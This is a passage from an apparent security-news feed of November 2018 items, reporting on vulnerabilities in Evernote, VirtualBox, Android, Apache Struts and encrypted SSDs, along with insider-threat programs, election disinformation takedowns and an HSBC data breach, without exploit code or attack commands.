The attacker only needs to trick an Evernote into opening a note in presentation mode, in this way he will be able to steal arbitrary files and execute commands.
TongQing Zhu showed how a hacker could exploit the vulnerability to read a Windows file and execute the Calculator application on the targeted system.
The flaw was tracked as CVE-2018-18524 and was initially addressed with the release of Evernote for Windows 6.16.1 beta in October. The final patch was released earlier this month with the release of Evernote 6.16.4.
TongQing Zhu has published two PoC videos for the exploitation of the flaw:
World Wide Web Inventor Wants New 'Contract' to Make Web Safe
8.11.2018 securityweek Security
The inventor of the World Wide Web on Monday called for a "contract" to make internet safe and accessible for everyone as Europe’s largest tech event began in Lisbon amid a backlash over its role in spreading "fake news".
Some 70,000 people are expected to take part in the four-day Web Summit, dubbed "the Davos for geeks", including speakers from leading global tech companies, politicians and start-ups hoping to attract attention from the over 1,500 investors who are scheduled to attend.
Tech firms now find themselves on the defensive, with critics accusing them of not doing enough to curb the spread of "fake news" which has helped polarise election campaigns around the world and of maximising profits by harvesting data on consumers’ browsing habits.
British computer scientist Tim Berners-Lee, who in 1989 invented the World Wide Web as a way to exchange information, said the internet had deviated from the goals its founders had envisaged.
"All kinds of things have things have gone wrong. We have fake news, we have problems with privacy, we have people being profiled and manipulated," he said in an opening address.
Berners-Lee, 63, called on governments, companies and citizens to iron out a "complete contract" for the web that will make the internet "safe and accessible" for all by May 2019, the date by which 50 percent of the world will be online for the first time.
'Going through a funk'
He has just launched Inrupt, a start-up which is building an open source platform called "Solid" which will decentralise the web and allow users to choose where their data is kept, along with who can see and access it.
Solid intends to allow users to bypass tech giants such as Google and Facebook. The two tech giants now have direct influence over nearly three quarters of all internet traffic thanks to the vast amounts of apps and services they own such as YouTube, WhatsApp and Instagram.
Employees of Google, Facebook and other tech giants have in recent months gone public with their regrets, calling the products they helped build harmful to society and overly addictive.
Tech giants are also under fire for having built up virtual monopolies in their areas.
Amazon accounts for 93 percent of all e-book sales while Google swallows up 92 percent of all European internet-search ad spending.
"I think technology is going through a funk... it's a period of reflection," Web Summit founder and CEO Paddy Cosgrave told AFP.
"With every new technology you go through these cycles. The initial excitement of the printed press was replaced in time by a great fear that it was actually a bad thing. Over time it has actually worked out OK."
Violent voices magnified
Among those scheduled to speak at the event is Christopher Wylie, a whistleblower who earlier this year said users’ data from Facebook was used by British political consultancy Cambridge Analytica to help elect US President Donald Trump -- a claim denied by the company.
Another tech veteran who has become critical of the sector, Twitter co-founder Ev Williams, will on Thursday deliver the closing address.
He left Twitter in 2011 and went on to co-found online publishing platform Medium, which is subscription based and unlike Twitter favours in-depth writing about issues.
The problem with the current internet model is that negative content gets more attention online, and thus gain more advertisers, according to Mitchell Baker, the president of the Mozilla Foundation, a non-profit organisation which promotes Internet innovation.
"Today everyone has a voice but the problem is... the loudest and often most violent voices get magnified because the most negative, scariest things attract our attention," she told AFP in a recent interview.
The Web Summit was launched in Dublin in 2010 and moved to Lisbon six years later. The Portuguese government estimates the event will generate 300 million euros ($347 million) for Lisbon in hotel and other revenues.
VMware Unveils New Blockchain Service
8.11.2018 securityweek IT
One of the new technologies announced on Tuesday by VMware at its VMworld 2018 Europe conference is VMware Blockchain, which aims to provide enterprises a decentralized trust infrastructure based on permissioned blockchain.
The blockchain is a distributed database consisting of blocks that are linked and protected against unauthorized modifications using cryptography. Transactions are only written to a block after they are verified by a majority of nodes.
While blockchain is mainly known for its role as the public transaction ledger for cryptocurrencies, companies have been increasingly using blockchain for other purposes, including for identity verification and securing data and devices.
VMware launches VMware Blockchain
There are three types of blockchain networks: public, private and permissioned. Public blockchain is mainly used for cryptocurrencies such as bitcoin, where anyone can join and any participant can make changes. In the case of a private blockchain, only verified participants can contribute. Permissioned blockchain is a mix between public and private and it provides numerous customization options.
Permissioned blockchain is fast and it’s increasingly used for enterprise applications, which is why the virtualization giant wants to help its customers by providing a hybrid, scalable and managed blockchain service.
“VMware Blockchain will provide the foundation for decentralized trust while delivering enterprise-grade scalability, reliability, security and manageability. The service will be integrated into existing VMware tools to help protect the network and compute functions that underlie a true enterprise blockchain,” said Mike DiPetrillo, blockchain senior director at VMware.
VMware Blockchain is being developed in collaboration with Dell Technologies, Deloitte and WWT, and it will be supported by both VMware products and IBM Cloud.
According to VMware, the new platform allows enterprises to deploy nodes across different cloud environments, it provides a central management interface, along with monitoring and auditing capabilities, and offers developers the tools and guidance they need.
VMware Blockchain is currently in beta. Organizations interested in testing it have been instructed to contact VMware.
Hackers Target Telegram, Instagram Users in Iran
8.11.2018 securityweek Hacking
Hackers have been targeting Iranian users of Telegram and Instagram with fake login pages, app clones and BGP hijacking in attacks that have been ongoing since 2017, Cisco Talos reveals.
Banned in Iran, Telegram is a popular target for greyware, software that provides the expected functionality but also suspicious enough to be considered a potentially unwanted program (PUP). Attacks on Iranian users differ in complexity, based on resources and methods, and those analyzed by Cisco were aimed at stealing personal and login information.
As part of these attacks, users were tricked into installing Telegram clones that can access a mobile device’s full contact lists and messages. The fake Instagram apps, on the other hand, were designed to send full session data to the attackers, who would then gain full control of the account in use.
“We believe this greyware has the potential to reduce the privacy and security of mobile users who use these apps. Our research revealed that some of these applications send data back to a host server, or are controlled in some way from IP addresses located in Iran, even if the devices are located outside the country,” Cisco says.
The greyware targeting Iran users includes software from andromedaa.ir, a developer targeting both iOS and Android with apps that are not in the official stores and which claim to boost users’ exposure on Instagram or Telegram by increasing the likes, comments, followers.
The email address used to register the andromedaa.ir domain was also used for domains distributing cloned Instagram and Telegram applications, the researchers discovered. Without even requiring the user’s Instagram password, the operator gains access to take over the user session, while the Telegram app provides access to contact list and messages.
In addition to greyware software, the attackers were also observed using fake login pages to target users in Iran, a technique that Iran-connected groups like “Charming Kitten” have been long using. Other actors would hijack the device’s BGP protocol and redirect the traffic, a type of attack that needs cooperation from an Internet service provider (ISP).
Although all of the observed attacks would target Iran, Cisco’s security researchers did not find a connection between them. The threat, however, looms over users worldwide, especially those in countries like Iran and Russia, where Telegram and similar apps are banned, and these are only some of techniques state-sponsored actors use to deploy surveillance mechanisms, Cisco notes.
In Iran, the researchers found several Telegram clones with thousands of installations that contact IP addresses located in Iran, and some of them claim to be able to circumvent the ban the Iran government has put on the encrypted communication service.
“The activity of these applications is not illegal, but it gives its operators total control over the messaging applications, and to some extent, users’ devices,” the security researchers point out.
Researcher Drops Oracle VirtualBox Zero-Day
8.11.2018 securityweek Vulnerebility
A researcher has disclosed the details of a zero-day vulnerability affecting Oracle’s VirtualBox virtualization software. The flaw appears serious as exploitation can allow a guest-to-host escape.
Russian researcher Sergey Zelenyuk discovered the security hole and he decided to make his findings public before giving Oracle the chance to release a patch due to his “disagreement with [the] contemporary state of infosec, especially of security research and bug bounty.”
According to Zelenyuk, the vulnerability affects VirtualBox 5.2.20 and prior versions – 5.2.20 is the latest version, released on October 16 – and it can be exploited on any host or guest operating system as the underlying bugs affect shared code. The expert has tested his exploit, which he claims is “100% reliable,” on Ubuntu 16.04 and 18.04 x86-64 guests, but he believes the attack also works against Windows.
An attack can only be carried out against virtual machines using an Intel PRO/1000 MT Desktop (82540EM) network card (E1000), with network address translation (NAT) enabled, which is the default configuration.
The security hole, caused by memory corruption bugs, allows an attacker with root or administrator privileges to the guest system to escape to the host userland (ring 3). From there, they may be able to obtain kernel privileges (ring 0) on the host by exploiting other vulnerabilities. Exploitation starts by loading a Linux kernel module (LKM) in the guest operating system.
“Elevated privileges are required to load a driver in both OSs. It's common and isn't considered an insurmountable obstacle. Look at Pwn2Own contest where researchers use exploit chains: a browser opened a malicious website in the guest OS is exploited, a browser sandbox escape is made to gain full ring 3 access, an operating system vulnerability is exploited to pave a way to ring 0, where there is anything you need to attack a hypervisor from the guest OS,” the researcher explained in a post on GitHub.
“The most powerful hypervisor vulnerabilities are for sure those that can be exploited from guest ring 3. There in VirtualBox is also such code that is reachable without guest root privileges, and it's mostly not audited yet,” he added.
While some agree with Zelenyuk regarding the current state of bug bounty programs, others questioned his decision.
Contacted by SecurityWeek, Oracle declined to comment and instead pointed to its vulnerability disclosure policies.
Until a patch is made available, users can protect themselves against potential attacks by changing the network card on their virtual machines to AMD PCnet or a paravirtualized network adapter. Another mitigation involves avoiding the use of NAT, Zelenyuk said.
Google Removes Vulnerable Library from Android
8.11.2018 securityweek Vulnerebility
Google this week released the November 2018 set of security patches for its Android platform, which address tens of Critical and High severity vulnerabilities in the operating system.
The addressed issues include remote code execution bugs, elevation of privilege flaws, and information disclosure vulnerabilities, along with a denial of service. Impacted components include Framework, Media framework, System, and Qualcomm components.
“The most severe vulnerability in this section could enable a proximate attacker using a specially crafted file to execute arbitrary code within the context of a privileged process,” Google explains.
The Internet giant also announced that the Libxaac library has been marked as experimental and is no longer used in production of Android builds. The reason for this is the discovery of multiple vulnerabilities in the library, and Google lists 18 CVEs impacting it.
As usual, the search company split the fixes into two parts, with the 2018-11-01 security patch level, addressing 17 flaws, including four rated Critical severity (all of which impact Media framework).
This security patch level fixes 7 elevation of privilege bugs (two rated Critical, four High severity, and one Medium), three remote code execution bugs (two Critical and one High severity), six information disclosure issues (all rated High severity) and one denial of service (Medium).
The 2018-11-05 security patch level, on the other hand, patches 19 issues, three of which were rated Critical.
Two of the bugs impact the Framework component, while the remaining 17 were addressed in Qualcomm components, including 14 issues in Qualcomm closed-source components (3 Critical and 11 High risk).
According to Google, it has no reports of active customer exploitation or abuse of these issues. The company also notes that exploitation of vulnerabilities is more difficult on newer versions of Android and encourages users to update as soon as possible.
In addition to these patches, Pixel and Nexus devices receive fixes for three additional vulnerabilities. These include an elevation of privilege in HTC components and two other bugs in Qualcomm components. All three are rated Medium severity.
“All Pixel devices running Android 9 will receive an Android 9 update as part of the November OTA. This quarterly release contains many functional updates and improvements to various parts of the Android platform and supported Pixel devices,” Google says.
A series of functional updates were also pushed to these devices, to improve performance for the use of picture-in-picture, Strongbox symmetric key generation requests, and stability for notifications.
UK Regulator Calls for Tougher Rules on Personal Data Use
7.11.2018 securityweek BigBrothers
Britain's data commissioner on Tuesday called for tougher rules governing the use of personal data by political campaigns around the world, declaring that recent investigations have shown a disturbing disregard for voters and their privacy.
Speaking to the U.K. Parliament's media committee, Elizabeth Denham updated lawmakers on her office's investigation into the use of data analysis by political campaigns - a probe that has already seen Facebook slapped with a maximum fine for data misuse. Denham warned that democracy is under threat because behavioral targeting techniques developed to sell products are now being used to promote political campaigns and candidates.
"I don't think that we want to use the same model that is used to sell us holidays and shoes and cars to engage with people and voters," she said. "I think people expect more than that."
New rules are needed to govern advertising and the use of data, Denham said. She called on all players — the government and regulators but also the big internet firms like Facebook and smaller brokers of online data — to reassess their responsibilities in the era of big data.
"We really need to tighten up controls across the entire ecosystem because it matters to our democratic processes," she said.
The U.K. data regulator is conducting a broad inquiry into how political parties, data companies and social media platforms use personal information to target voters during political campaigns, including Britain's 2016 Brexit referendum on EU membership. The investigation followed allegations that British consultancy Cambridge Analytica improperly used information from more than 87 million Facebook accounts to manipulate elections.
Denham said legal systems had failed to keep up with the rapid development of the internet, and that tech companies need to be subject to greater oversight.
"I think the time for self-regulation is over," she said. "That ship has sailed."
Committee chair Damian Collins said he heard her opinion "loudly" and repeated his demand that Facebook CEO Mark Zuckerberg testify before his committee.
As she updated lawmakers on the probe, Denham announced fines for the campaign backing Britain's departure from the European Union and an insurance company founded by its millionaire backer totaling 135,000 pounds ($176,000) for breaches of data laws.
Denham said the Brexit campaign group Leave.EU and Eldon Insurance company — founded by businessman Arron Banks —were fined 60,000 pounds each for "serious breaches" of electronic marketing laws.
Leave.EU was also fined 15,000 pounds for a separate breach in which almost 300,000 emails were sent to Eldon customers with a newsletter for the Brexit campaign group.
The data watchdog is also "investigating allegations that Eldon Insurance Services Limited shared customer data obtained for insurance purposes with Leave.EU."
Facebook Blocks 115 Accounts on Eve of US Election
7.11.2018 securityweek Social
Facebook said Monday it blocked some 30 accounts on its platform and 85 more on Instagram after police warned they may be linked to "foreign entities" trying to interfere in the US midterm election.
The announcement came shortly after US law enforcement and intelligence agencies said that Americans should be wary of Russian attempts to spread fake news. The election is Tuesday.
A study published last week found that misinformation on social media was spreading at a greater rate than during the run-up to the 2016 presidential vote, which Russia is accused of manipulating through a vast propaganda campaign in favor of Donald Trump, the eventual winner.
"On Sunday evening, US law enforcement contacted us about online activity that they recently discovered and which they believe may be linked to foreign entities," Facebook head of cybersecurity policy Nathaniel Gleicher said in a blog post.
"We immediately blocked these accounts and are now investigating them in more detail."
The investigation so far identified around 30 Facebook accounts and 85 Instagram accounts that appeared to be engaged in "coordinated inauthentic behavior," Gleicher said.
He added that all the Facebook pages associated with the accounts appeared to be in French or Russian.
The Instagram accounts were mostly in English, with some "focused on celebrities, others political debate."
"Typically, we would be further along with our analysis before announcing anything publicly," Gleicher said.
"But given that we are only one day away from important elections in the US, we wanted to let people know about the action we've taken and the facts as we know them today."
Despite an aggressive crackdown by social media firms, so-called "junk news" is spreading at a greater rate than in 2016 on social media ahead of Tuesday's US congressional election, Oxford Internet Institute researchers said in a study published Thursday.
Twitter said Saturday it deleted a "series of accounts" that attempted to share disinformation. It gave no number.
Facebook last month said it took down accounts linked to an Iranian effort to influence US and British politics with messages about charged topics such as immigration and race relations.
The social network identified 82 pages, groups and accounts that originated in Iran and violated policy on coordinated "inauthentic" behavior.
Gleicher said at the time there was overlap with accounts taken down earlier this year and linked to Iranian state media, but the identity of the culprits has yet to be determined.
Posts on the accounts or pages, which included some hosted by Facebook-owned Instagram, focused mostly on "sowing discord" via strongly divisive issues rather than on particular candidates or campaigns.
Sample posts shared included inflammatory commentary about US President Donald Trump, British Prime Minister Theresa May and the controversy around freshly appointed US Supreme Court Justice Brett Kavanaugh.
Major online social platforms have been under intense pressure to avoid being used by "bad actors" out to sway outcomes by publishing misinformation and enraging voters.
Facebook weeks ago opened a "war room" at its Menlo Park headquarters in California to be a nerve center for the fight against misinformation and manipulation of the largest social network by foreign actors trying to influence elections in the United States and elsewhere.
The shutdown of thousands of Russian-controlled accounts by Twitter and Facebook -- plus the indictments of 14 people from Russia's notorious troll farm the Internet Research Agency -- have blunted but by no means halted their efforts to influence US politics.
Facebook, which has been blamed for doing too little to prevent misinformation efforts by Russia and others in the 2016 US election, now wants the world to know it is taking aggressive steps with initiatives like the war room.
The war room is part of stepped up security announced by Facebook, which will be adding some 20,000 employees.
Apache Struts Users Told to Update Vulnerable Component
7.11.2018 securityweek Vulnerebility
Apache Struts developers are urging users to update a file upload library due to the existence of two vulnerabilities that can be exploited for remote code execution and denial-of-service (DoS) attacks.
The team behind the open source development framework pointed out that the Commons FileUpload library, which is the default file upload mechanism in Struts 2, is affected by a critical remote code execution vulnerability.
The flaw, tracked as CVE-2016-1000031, was discovered by Tenable researchers back in 2016. It was patched with the release of Commons FileUpload version 1.3.3 in June 2017.
“There exists a Java Object in the Apache Commons FileUpload library that can be manipulated in such a way that when it is deserialized, it can write or copy files to disk in arbitrary locations. Furthermore, while the Object can be used alone, this new vector can be integrated with ysoserial to upload and execute binaries in a single deserialization call,” Tenable said when it disclosed the security bug.
Struts versions after 2.5.12 are already using version 1.3.3 of the library, but applications using Struts 2.3.36 and earlier need to update the library manually by replacing the commons-fileupload JAR file in WEB-INF/lib with the patched version.
Version 1.3.3 of the Commons FileUpload library also includes a fix for a less severe DoS vulnerability discovered in 2014 and tracked as CVE-2014-0050.
Malicious actors could exploit this flaw to launch DoS attacks on publicly accessible sites, Apache Struts developers warned. This vulnerability was first patched in February 2014 with the release of version 1.3.1.
Johannes Ullrich, dean of research at the SANS Technology Institute, also advised users to check for other copies of the library on their system since Struts is not the only one using it.
It’s not uncommon for malicious hackers to exploit Apache Struts vulnerabilities in their attacks, even one year after they have been patched.
One recent example involves CVE-2018-11776, an easy-to-exploit bug that cybercriminals have exploited to deliver cryptocurrency miners.
U.S. Government Publishes New Insider Threat Program Maturity Framework
7.11.2018 securityweek BigBrothers
National Insider Threat Task Force (NITTF) Releases New Insider Threat Program Maturity Framework
Some 18 months after WikiLeaks began to publish the Iraq War Logs exfiltrated by Chelsea Manning (at that time, Bradley Manning), President Obama issued a Presidential Memorandum: National Insider Threat Policy and Minimum Standards for Executive Branch Insider Threat Programs Memorandum for the Heads of Executive Departments and Agencies.
"The resulting insider threat capabilities," it said, "will strengthen the protection of classified information across the executive branch and reinforce our defenses against both adversaries and insiders who misuse their access and endanger our national security."
It clearly didn't work. A year later, the Edward Snowden leaks began to appear -- and leaks have continued ever since. In 2016, the hacking group known as Shadow Brokers began to leak NSA tools (including the EternalBlue details that were used by WannaCry and NotPetya); but there have been suggestions that the documents were initially leaked to the Shadow Brokers by NSA contractor Hal Martin.
In 2017, the Vault 7 (CIA files) began to appear. In June 2018, Joshua Adam Schulte -- a former employee of first the NSA and then the CIA -- was charged with the theft of the classified CIA documents published by WikiLeaks.
On November 1, 2018, the National Insider Threat Task Force (NITTF), operating under the joint leadership of the Attorney General and the Director of National Intelligence, published a new Insider Threat Program Maturity Framework (PDF). The purpose, announced a statement from the Office of the Director of National Intelligence, is "to help executive branch departments and agenciesí insider threat programs advance beyond the Minimum Standards to become more proactive, comprehensive, and better postured to deter, detect, and mitigate insider threat risk."
The new Framework takes key elements from the Obama 'minimum standards' memorandum and enhances and expands them so that departments and agencies (D/As) using them can "garner greater benefits from insider threat program resources, procedures, and processes." It comprises 19 elements that each identifies an attribute of an advanced Insider Threat Program (InTP). Each element, according to the introduction to the Framework, "provides amplifying information to assist programs in strengthening the effectiveness of the associated minimum standard."
This Framework is specifically designed for government departments and agencies, and its primary purpose is to defend national security rather than capitalist IP. D/As are very different in make up, mission and culture to private industry -- but private industry has its own potentially larger insider threat to manage. There will be a temptation for private industry to seek to adopt the same framework.
For example, David Wilcox, VP of federal for Dtex Systems, has commented, "The Dtex annual insider threat intelligence report revealed that insider threats are active in all industries, including government. This Framework comes at a pivotal time, when insider threats are on the rise and the damages they cause are increasing. This framework points out key elements for addressing insider threats, which could be used by any industry to reduce related risks."
Some of the Framework's elements could certainly be transposed to and used by private industry. Others will need to be approached with caution. For example, the very first element describes "the joint responsibility and commitment of D/A and InTP leadership to develop InTP infrastructure and personnel and promote the importance of addressing the insider threat at a level sufficient to create an effective and enduring Program."
The third element says, "It is crucial for InTPs in countering the insider threat to maintain compliance with changes in the policy, legal, regulatory, workforce, and technology environments of their D/A. The InTP can remain current through participation in D/A forums involved in policy-making, regulatory developments, and technology infrastructure advances to assess the impact of any changes on Program compliance and effectiveness."
This is already beginning to look like a new department with a high-level and highly specialist leadership that will undoubtedly be expensive. With companies already questioning the need to have new Data Processing Officer -- as required by GDPR -- the need for more expense that is not required by law will undoubtedly be questioned. Any organization seeking to use the Framework as a guide for its own insider threat program will first need to distil the guidelines into something affordable.
There are more banana skins for private industry in the Framework. Element 7 describes an insider threat awareness training requirement -- which is good practice. But where do you go from there? "InTPs can drive cultural change within their D/As and build a culture of insider threat awareness and responsibility for reporting potential insider threats through communications campaigns."
The danger here is that it could lead to at least subtle encouragement for staff to report each other as potential insider threats. That could easily go horribly wrong and lead to a deteriorating workplace culture.
This is not to say that the Framework is devoid of good practices that could transpose to private industry. Elements 14 and 15 offer advice on insider threat detection. The former suggests the use of advanced analytics and anomaly detection. Such tools, suggest Element 14, "can help manage large data volume as a first step in establishing a baseline from which to identify anomalous behavior. Data analytic tools can help insider threat analysts to contextualize the behavior in supporting decisions to conduct inquiries, refer matters to response elements, and/or develop mitigation strategies."
Element 15 is more creepy, but could be managed if implemented carefully. "Each employee responds to events and conditions in their work and personal lives differently -- that response, positive or negative, is a key concern for an InTP. A program with access to personnel with behavioral sciences expertise, either through internal D/A or affiliated resources, can strengthen its capabilities to identify and assess types of concerning behavior, contextualize the behavior, discern unconscious biases and propose alternative hypotheses."
This is the use of the expanding field of behavioral science. It would require monitoring staff emails and chats, but has the advantage of being, or at least appearing to be, impersonal. In 2017 a paper published by the Intelligence and National Security Alliance (INSA) suggests psycholinguistic analysis could detect the development of an insider threat before the threat becomes a reality.
The paper discusses what it calls counterproductive work behaviors (CWBs). It asserts that malicious insiders do not start work as malicious insiders, but that life and work pressures and stresses create them. Escalating CWBs can be detected through psycholinguistic analysis of emails, personal blogs, chats and tweets -- the theory being that an unhappy employee can be detected and helped before he or she becomes a malicious insider employee.
Despite concerns that private industry should perhaps not attempt to transpose the Framework verbatim into the workplace, there is nevertheless much that is good that could form the basis of good practice in insider threat protection. While it has been designed for government departments and agencies, it could still be useful to private organizations if they cherry-pick.
Psycho-Analytics Could Aid Insider Threat Detection
7.11.2018 securityweek Security
Psycho-Analytics Could Help Detect Future Malicious Behavior
The insider threat is perhaps the most difficult security risk to detect and contain -- and concern is escalating to such an extent that a new bill, H.R.666 - Department of Homeland Security Insider Threat and Mitigation Act of 2017, passed through Congress unamended in January 2017.
The bill text requires the Department of Homeland Security (DHS) to establish an Insider Threat Program, including training and education, and to "conduct risk mitigation activities for insider threats." What it does not do, however, is explain what those 'mitigation activities' should comprise.
One difficulty is that the insider is not a uniform threat. It includes the remote attacker who becomes an insider through using legitimate but stolen credentials, the naive employee, the opportunistic employee, and the malicious insider. Of these, the malicious insider is the most intransigent concern.
Psycho-analytics Used for Insider Threat Detection
Traditional security controls, such as access control and DLP, have some but little effect. In recent years, these have been supplemented by user behavior analytics (UBA), using machine learning to detect anomalous user behavior within the network.
"Behavioral analytics is the only way to... get real insight into insider threat," explains Nir Polak, CEO of Exabeam. "UBA tells you when someone is doing something that is unusual and risky, on an individual basis and compared to peers. UBA cuts through the noise to give real insight – any agencies looking to get a handle on insider threat should be looking closely at UBA."
Humphrey Christian, VP of Product Management, at Bay Dynamics, advocates a combination of UBA and risk management. "A threat is not a threat if it's targeting an asset that carries minimal value to the organization. An unusual behavior is also not a threat if it was business justified, such as it was approved by the employee's manager," he told SecurityWeek. "Once an unusual behavior is identified, the application owner who governs the application at risk, must qualify if he indeed gave the employee access to the asset. If the answer is 'no', then that alert should be sent to the top of the investigation pile."
Learn to Detect Insider ThreatsThis week a new paper published by the Intelligence and National Security Alliance (INSA) proposes that physical user behavioral analytics should go a step further and incorporate psycho-analytics set against accepted behavior models. These are not just the baseline of acceptable behavior on the network, but incorporate the psychological effect of life events both inside and outside of the workplace. The intent is not merely to respond to anomalous behavior that has already happened, but to get ahead of the curve and be able to predict malicious behavior before it happens.
The INSA paper starts from the observation that employees don't just wake up one morning and decide to be malicious. Malicious behavior is invariably the culmination of progressive dissatisfaction. That dissatisfaction can be with events both within and outside the workplace. INSA's thesis is that clues to this progressive dissatisfaction could and should be detected by technology; machine learning (ML) and artificial intelligence (AI).
This early detection would allow managers to intervene and perhaps help a struggling employee and prevent a serious security event.
Early signs of unhappiness within the workplace can be relatively easy to detect when they manifest as 'counterproductive work behaviors' (CWBs). INSA suggests that there are three key insights "that are key to detecting and mitigating employees at risk for committing damaging insider acts." CWBs do not occur in isolation; they usually escalate; and they are seldom spontaneous.
Successful insider threat mitigation can occur when early non-harmful CWBs can be detected before they escalate.
Using existing studies, such as the Diagnostic and Statistical Manual of Mental Disorders Vol. 5 (DSM-5), INSA provides a table of stressors and potentially linked CWBs. For example, emotional stress at the minor level could lead to repeated tardiness; at a more serious level it could lead to bullying co-workers and unsafe (dangerous) behavior. INSA's argument is that while individual CWBs might be missed by managers and HR, patterns -- and any escalation of stress indicators -- could be detected by ML algorithms. This type of user behavior analytics goes beyond anomalous network activity and seeks to recognize stressed user behavior that could lead to anomalous network activity before it happens.
But it still suffers from one weakness -- that is, where the stressors that affect the user's work occur entirely outside of the workplace; such as divorce, financial losses, or family illness. Here INSA proposes a more radical approach, but one that would work both inside and outside the workplace.
"In particular," it suggests, "sophisticated psycholinguistic tools and text analytics can monitor an employee's communications to identify life stressors and emotions and help detect potential issues early in the transformation process."
The idea is to monitor and analyze users' communications, which could include tweets and blogs. The analytics would look for both positive and negative words. An example is given. "I love food ... with ... together we ... in ... very ... happy." This sequence could easily appear in a single tweet; but the use of 'with', 'together', and 'in' would suggest an inclusive and agreeable temperament.
In fairness to doubters, INSA has done itself no favors with the misuse of a second example. Here Chelsea (formerly Bradley) Manning is quoted. "A second blog post," says INSA, "substantiates that Life Event and identifies an additional one, 'Relationship End/Divorce' with two mentions for each Life Event." The implication is that psycholinguistic analysis of this post would have highlighted the stressors in Manning's life and warned employers of the potential for malicious activity. The problem, however, is that the quoted section comes not from a Manning blog post before the event, but from the chat logs of his conversation with Lamo in May 2010 (see Wired) after WikiLeaks had started publishing the documents. The linguistic analysis in this case might have helped explain Manning's actions, but could do nothing to forewarn the authorities.
The point, however, is that psycholinguistic analysis has the potential to highlight emotional status, and over time, highlight individuals on an escalating likelihood of developing first minor CWBs and ultimately major CWBs. The difficulty is that it really is kind of creepy. That creepiness is acknowledged by INSA. "Use of these tools entails extreme care to assure individuals' civil or privacy rights are not violated," it says. "Only authorized information should be gathered in accordance with predefined policies and legal oversight and only used for clearly defined objectives. At no point should random queries or 'What If' scenarios be employed to examine specific individuals without predicate and then seek to identify anomalous bad behavior."
Users' decreasing expectation of privacy would suggest that sooner or later psycholinguistic analysis for the purpose of identifying potential malicious insiders before they actually become malicious insiders will become acceptable. In the meantime, however, it should be used with extreme caution and with the clear, unambiguous informed consent of users. What INSA is advocating, however, is an example of what law enforcement agencies have been seeking for many years: the ability to predict rather than just respond to bad behavior
Researchers Break Full-Disk Encryption of Popular SSDs
7.11.2018 securityweek Safety
The encryption mechanism used by several types of solid state drives contains vulnerabilities that an attacker could exploit to access encrypted data without knowing a password.
The issues were discovered by Carlo Meijer and Bernard van Gastel from the Radboud University in the Netherlands and impact popular drives from Samsung and Crucial. The bugs impact both internal and external drives, the researchers explain in a paper (PDF).
Hardware encryption is meant to address weaknesses in software encryption and is performed on the drive itself, usually through a dedicated AES co-processor, with the drive’s firmware in charge of key management.
Full-disk encryption software could even switch off when hardware encryption is available, and rely solely on the latter. This is what Microsoft Windows’ BitLocker does, meaning that the data is not encrypted at all if hardware encryption fails.
When it comes to the implementation of a full-disk encryption scheme, there are pitfalls that should be avoided, such as not linking the user password and the disk encryption key (DEK), using a single DEK for the entire disk, or not using enough entropy in randomly generated DEKs.
Wear levelling could also prove an issue, if the DEK is initially stored unprotected and not overwritten after encryption. Similarly, DEVSLP (device sleep) could prove problematic, if the drive writes its internal state to non-volatile memory and the memory is not erased upon wake-up, as it would allow an attacker to extract the DEK from the last stored state.
The researchers investigated the security of various popular SSD models and discovered that their encryption schemes are impacted by one or more of these issues.
Crucial MX100 and MX200, for example, lack cryptographic binding between password and DEK, meaning that decryption is possible without actually providing the user-password. This is true for both ATA security and Opal standard implementations that are supported by the models.
“The scheme is essentially equivalent to no encryption, as the encryption key does not depend on secrets,” the researchers note.
The drives also support a series of vendor-specific commands that engineers use to interact with the device, but which need to be unlocked first. However, the researchers discovered it was trivial to unlock these commands, which allows for code execution on the device.
On the Samsung 840 EVO, a SATA SSD released in 2013, the ATA password may be cryptographically bound to the DEK, and no weakness was identified in the TCG Opal implementation, the researchers say. However, it would be possible to recover the DEK due to the wear levelling mechanism.
However, the ATA security mechanism can be tricked into revealing the drive content, and the issue was also found to impact the Samsung 850 EVO (released in 2014). The newer model isn’t vulnerable to the wear levelling attack either, and no weaknesses were found in the TCG Opal implementation either.
On the Samsung T3 USB external disk, however, there was no cryptographic binding between password and DEK, an issue present on the Samsung T5 portable as well.
“The results presented in this paper show that one should not rely solely on hardware encryption as offered by SSDs for confidentiality. We recommend users that depend on hardware encryption implemented in SSDs to employ also a software full-disk encryption solution, preferably an open-source and audited one,” the researchers note.
“A pattern of critical issues across vendors indicates that the issues are not incidental but structural, and that we should critically assess whether this process of standards engineering actually benefits security, and if not, how it can be improved,” they also point out.
The vulnerabilities were reported to the affected vendors half a year ago but made public only now. Samsung has publicly acknowledged the flaws and also issued firmware updates to address them on the portable SSDs.
HSBC Bank USA Warns Customers of Data Breach
7.11.2018 securityweek Incindent
Unknown attackers were able to access online accounts of HSBC Bank USA users in the first half of October, the bank told customers in a letter.
The data breach happened between October 4 and October 14, and prompted the United States subsidiary of UK-based HSBC to block access to online accounts, to prevent further unauthorized access, the letter the bank sent to customers (PDF) reveals.
“When HSBC discovered your online account was impacted, we suspended online access to prevent further unauthorized entry of your account. You may have received a call or email from us so we could help you change your online banking credentials and access your account,” HSBC explains.
The notice also reveals the large amount of data that was exposed to the attackers when they accessed the online accounts.
“The information that may have been accessed includes your full name, mailing address, phone number, email address, date of birth, account numbers, account types, account balances, transaction history, payee account information, and statement history where available,” the letter reads.
Following the incident, the bank also decided to enhance the authentication process for HSBC Personal Internet Banking with the addition of an extra layer of security. The organization is also providing impacted customers with credit monitoring and identity theft protection.
Impacted customers are also advised to monitor their accounts for any unauthorized activity and to contact the bank if they notice anything suspicious. They should also place a fraud alert on their credit files, so that creditors would contact them before making any new operation.
Periodically obtaining credit reports and informing law enforcement of any suspicious activity should also help the bank’s users avoid losses.
This data breach is not the first cyber incident involving HSBC. Last year, the bank’s users were targeted with fake security software, while in 2016 a crippling distributed denial of service (DDOS) attack knocked its systems offline for hours.
Personal data in spam
We have often said that personal data is candy on a stick to fraudsters and must be kept safe (that is, not given out on dubious websites). It can be used to gain access to accounts and in targeted attacks and ransomware campaigns.
In Q3, we registered a surge of fraudulent emails in spam traffic. This type of scam we have already reported at the beginning of the year. A ransom (in bitcoins) is demanded in exchange for not disclosing the “damaging evidence” concerning the recipients. The new wave of emails contained users’ actual personal data (names, passwords, phone numbers), which the scammers used to try to convince victims that they really had the information specified in the message. The spam campaign was carried out in several stages, and it is likely that the fraudsters made use of a range of personal information databases, as evidenced, for example, by the telephone number formats that varied from stage to stage.
Whereas before, the target audience was primarily English-speaking, in September we logged a spate of mailings in other languages, including German, Italian, Arabic, and Japanese.
